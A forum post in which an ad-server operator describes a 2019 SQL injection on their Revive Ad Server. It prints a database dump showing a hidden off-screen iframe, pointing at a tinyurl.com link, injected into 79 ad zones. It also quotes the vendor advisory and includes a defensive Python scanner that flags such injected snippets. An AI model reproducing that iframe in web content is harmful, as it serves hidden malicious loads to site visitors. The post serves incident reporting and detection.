Revive Ad Server MySQL Injection Attack

Old 05-02-2019

No rest for the weary, a Revive Ad Server I am responsible for experienced a MySQL injection attack due to a vulnerability uncovered in the past few months. I was busy developing Vue.js code for the forums and thought to myself "I will get around to upgrading to Revive 4.2.0 (supposedly the not-vulnerable version) when I get further down the road developing my Vue.js project". After all (sarcasm assured), why upgrade to mitigate a security vulnerability in a "working PHP 5.6 version of Revive" when upgrading to Revive 4.2.0 also requires an upgrade to PHP 7.0?!

Then, of course, it happens. No good deed goes unpunished, as they say; and while I was busy 12 hours a day coding in Vue.js, some "person with no life to speak of" injects very nasty adware into the DB. Here are the SQL table entries from the hacked server in the vulnerable append and prepend tables in Revive, which I never use anyway, injected with this very nasty adware.

This adware pulled down a lot of code and really damaged the ad server and also the search engine rankings because of the adware in the browser. Strangely, Google Webmaster Tools did not detect this, which is quite a shock, but there you go. Google Search really punished the site for the injected adware but on the other hand, GWTs did not detect it. Hmmm.

Here is what the "low lifes" injected:

Code:
mysql> SELECT zoneid, append, prepend FROM ox_zones WHERE append != '' OR prepend != ''; 
+--------+--------+----------------------------------------------------------------------------------------+
| zoneid | append | prepend                                                                                |
+--------+--------+----------------------------------------------------------------------------------------+
|      1 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      2 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      3 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      4 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      5 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      6 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      7 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      8 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      9 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     10 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     11 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     12 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     13 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     14 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     15 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     16 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     17 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     18 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     19 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     20 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     21 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     22 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     23 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     24 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     25 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     26 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     27 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     48 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     47 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     46 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     44 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     43 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     42 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     39 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     40 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     41 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     49 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     50 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     51 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     52 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     53 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     54 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     55 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     56 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     57 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     58 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     59 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     60 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     61 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     62 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     63 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     64 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     65 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     66 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     67 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     68 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     69 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     70 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     71 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     72 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     73 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     74 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     75 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     76 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     77 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     78 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     79 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     80 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     81 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     82 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     83 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     84 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     85 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     86 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     87 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     88 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     89 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     90 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     91 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
+--------+--------+----------------------------------------------------------------------------------------+
79 rows in set (0.00 sec)

I think I need to move off the Revive Ad Server, because this is the second time in around six years that the Revive software has been found to have an SQL injection vulnerability that also caused me a lot of time wasted and damage to our "search engine reputation and integrity".

The last time it happened was a few days before New Year's many years ago when I was on vacation in Bali scuba diving with this very cool Japanese woman I used to know and the entire holiday was ruined because of it.

People who do not operate on the web have little idea of how much work it is to keep the engine running smoothly, 24x7, so others can enjoy the web!! :)

Revive Adserver Security Advisory REVIVE-SA-2019-001, Date: 2019-04-23
  • Advisory ID: REVIVE-SA-2019-001
  • CVE-IDs: TBA
  • Date: 2019-04-23
  • Risk Level: High
  • Applications affected: Revive Adserver
  • Versions affected: < 4.2.0
  • Versions not affected: >= 4.2.0

Date of advisory: 2019-04-23. Date first signs of SQL injection noticed: 2019-04-30 (and ad server disabled). Update complete: 2019-05-02.

... gotta be fast in today's fast-paced cyber world.
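A defender-side check for the kind of stored payload shown in the dump above, added here as an example and not part of Neo's post or of the Revive code base: it scans append/prepend values for active tags, off-screen styling and known-bad hosts, and builds the cleanup statements for the rows it flags. The sample rows are constructed (row 1 reuses the iframe from the dump); the regex rules and the BAD_HOSTS list are assumptions to tune for your own installation.

```python
import re

# Constructed sample shaped like the post's ox_zones output: (zoneid, append,
# prepend). Row 1 reuses the iframe from the dump; rows 2-4 are made up here.
SAMPLE_ROWS = [
    (1, "", "<iframe style='position:absolute;left:-9999px;' "
            "src='//tinyurl.com/y4tkrgmb'></iframe>"),
    (2, "<!-- publisher footer note -->", ""),
    (3, "", ""),
    (4, "<script src='//cdn.example.invalid/a.js'></script>", ""),
]

# Active tags have no business in append/prepend on a setup that never uses
# those fields; off-screen styling is the classic hidden-iframe tell.
ACTIVE_TAG_RE = re.compile(r"<\s*(iframe|script|object|embed)\b", re.I)
HIDDEN_STYLE_RE = re.compile(
    r"(?:left|top)\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden",
    re.I)
# Known-bad landing hosts: assumption, seeded from the post's own dump.
BAD_HOSTS = ("tinyurl.com",)

def suspicious_reasons(html):
    """Return the reasons a zone snippet looks injected ([] means clean)."""
    reasons = []
    m = ACTIVE_TAG_RE.search(html)
    if m:
        reasons.append("active tag <%s>" % m.group(1).lower())
    if HIDDEN_STYLE_RE.search(html):
        reasons.append("hidden/off-screen styling")
    for host in BAD_HOSTS:
        if host in html.lower():
            reasons.append("known-bad host %s" % host)
    return reasons

def scan_zone_rows(rows):
    """Return (zoneid, column, reasons) for every value that trips a rule."""
    findings = []
    for zoneid, append, prepend in rows:
        for column, value in (("append", append), ("prepend", prepend)):
            reasons = suspicious_reasons(value) if value else []
            if reasons:
                findings.append((zoneid, column, reasons))
    return findings

def cleanup_sql(findings):
    """Build the UPDATEs that blank each flagged column; review before running."""
    return ["UPDATE ox_zones SET %s = '' WHERE zoneid = %d;" % (col, int(zid))
            for zid, col, _ in findings]
```

Feed it the real rows from `SELECT zoneid, append, prepend FROM ox_zones` and diff the output against a known-good export after each upgrade, so a re-injection shows up before the search engines notice it.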
These 4 Users Gave Thanks to Neo For This Post: